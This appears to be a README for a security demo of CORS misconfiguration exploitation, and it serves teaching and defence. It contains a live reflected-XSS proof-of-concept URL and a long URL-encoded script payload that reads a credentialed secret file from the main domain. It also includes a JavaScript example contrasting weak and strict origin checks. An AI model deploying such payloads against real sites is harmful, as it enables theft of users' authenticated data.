cors-misconfig-Exploitation-Demo

main.domain.com serves a secret file (secret) whose CORS policy allows any subdomain of domain.com to read it: the server reflects the requesting subdomain into Access-Control-Allow-Origin and sets Access-Control-Allow-Credentials: true.

This can be exploited once an attacker finds an XSS on any subdomain of domain.com (in this demo, xss.domain.com). Script running in that subdomain's origin can request the secret with the victim's cookies and exfiltrate the response to a server the attacker controls.
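The server-side check behind this misconfiguration, as an added example that is not part of the demo's own code. It contrasts the trust-any-subdomain policy the demo relies on with an exact-match allowlist, and a small helper models the browser rule that a credentialed response is only exposed when the origin is echoed verbatim (a `*` wildcard is rejected). The allowlist contents and the function names are assumptions for illustration; the hostnames come from the demo.

```javascript
// Added example, not from the original demo: two ways a server might decide
// which Origin to echo back in Access-Control-Allow-Origin.

const PARENT_DOMAIN = "cors-demo.rf.gd";                        // demo's main domain
const TRUSTED_ORIGINS = new Set(["https://cors-demo.rf.gd"]);    // assumed allowlist

function allowHeaders(origin) {
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin", // keep caches from serving one origin's ACAO to another
  };
}

// Weak policy (what the demo exploits): any host under the parent domain is
// trusted, so a single XSS on any subdomain is enough to read secret.php.
function weakCorsHeaders(origin) {
  let host;
  try {
    host = new URL(origin).hostname;
  } catch {
    return {}; // malformed or missing Origin: emit no CORS headers
  }
  if (host === PARENT_DOMAIN || host.endsWith("." + PARENT_DOMAIN)) {
    return allowHeaders(origin);
  }
  return {};
}

// Strict policy: compare the full origin string (scheme + host + port) against
// an explicit allowlist; subdomains are not implicitly trusted.
function strictCorsHeaders(origin) {
  return TRUSTED_ORIGINS.has(origin) ? allowHeaders(origin) : {};
}

// Browser rule: with credentials, the response is readable only if ACAO equals
// the requesting origin exactly and ACAC is "true".
function browserWouldExposeResponse(headers, origin) {
  return (
    headers["Access-Control-Allow-Origin"] === origin &&
    headers["Access-Control-Allow-Credentials"] === "true"
  );
}

// Stand-alone run: the XSS'd subdomain from the demo against both policies.
const xssOrigin = "http://xss.cors-demo.rf.gd";
console.log("weak policy exposes secret:",
  browserWouldExposeResponse(weakCorsHeaders(xssOrigin), xssOrigin));   // true
console.log("strict policy exposes secret:",
  browserWouldExposeResponse(strictCorsHeaders(xssOrigin), xssOrigin)); // false
```

Detection-wise, the weak branch is easy to spot in a proxy: send the request with an Origin of an arbitrary subdomain and look for that value echoed in Access-Control-Allow-Origin next to Access-Control-Allow-Credentials: true.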


I have set up this demo on a free hosting account.

Main domain : cors-demo.rf.gd --> This has the CORS misconfiguration.

Subdomain : xss.cors-demo.rf.gd --> This has a reflected XSS.


PoC of the reflected XSS : http://xss.cors-demo.rf.gd/index.php?uname=Noman<script>alert(document.domain)</script>

PoC of extracting data from the main domain using the XSS (the URL-encoded uname parameter injects a script that sends an XMLHttpRequest to http://cors-demo.rf.gd/secret.php with withCredentials set to true, then alerts the response and writes it into the page):

http://xss.cors-demo.rf.gd/index.php?uname=Noman%3c%70%20%69%64%3d%64%65%6d%6f%3e%3c%2f%70%3e%3c%73%63%72%69%70%74%3e%66%75%6e%63%74%69%6f%6e%20%63%6f%72%73%28%29%20%7b%20%20%76%61%72%20%78%68%74%74%70%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%20%20%78%68%74%74%70%2e%6f%6e%72%65%61%64%79%73%74%61%74%65%63%68%61%6e%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%20%20%20%20%20%20%20%20%69%66%20%28%74%68%69%73%2e%72%65%61%64%79%53%74%61%74%65%20%3d%3d%20%34%20%26%26%20%74%68%69%73%2e%73%74%61%74%75%73%20%3d%3d%20%32%30%30%29%20%7b%20%20%20%20%20%20%20%20%61%6c%65%72%74%28%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%3b%20%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%64%65%6d%6f%22%29%2e%69%6e%6e%65%72%48%54%4d%4c%20%3d%20%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%3b%20%20%20%20%20%20%20%20%7d%20%20%7d%3b%20%20%78%68%74%74%70%2e%6f%70%65%6e%28%22%47%45%54%22%2c%20%22%68%74%74%70%3a%2f%2f%63%6f%72%73%2d%64%65%6d%6f%2e%72%66%2e%67%64%2f%73%65%63%72%65%74%2e%70%68%70%22%2c%20%74%72%75%65%29%3b%20%20%78%68%74%74%70%2e%77%69%74%68%43%72%65%64%65%6e%74%69%61%6c%73%20%3d%20%74%72%75%65%3b%20%20%78%68%74%74%70%2e%73%65%6e%64%28%29%3b%7d%63%6f%72%73%28%29%3b%3c%2f%73%63%72%69%70%74%3e

You can watch the proof of concept : https://youtu.be/CSmrzEVRqKI

and you can read the blog post on the same : https://bugbaba.blogspot.com/2018/02/exploiting-cors-miss-configuration.html

For any queries/feedback you can contact me :)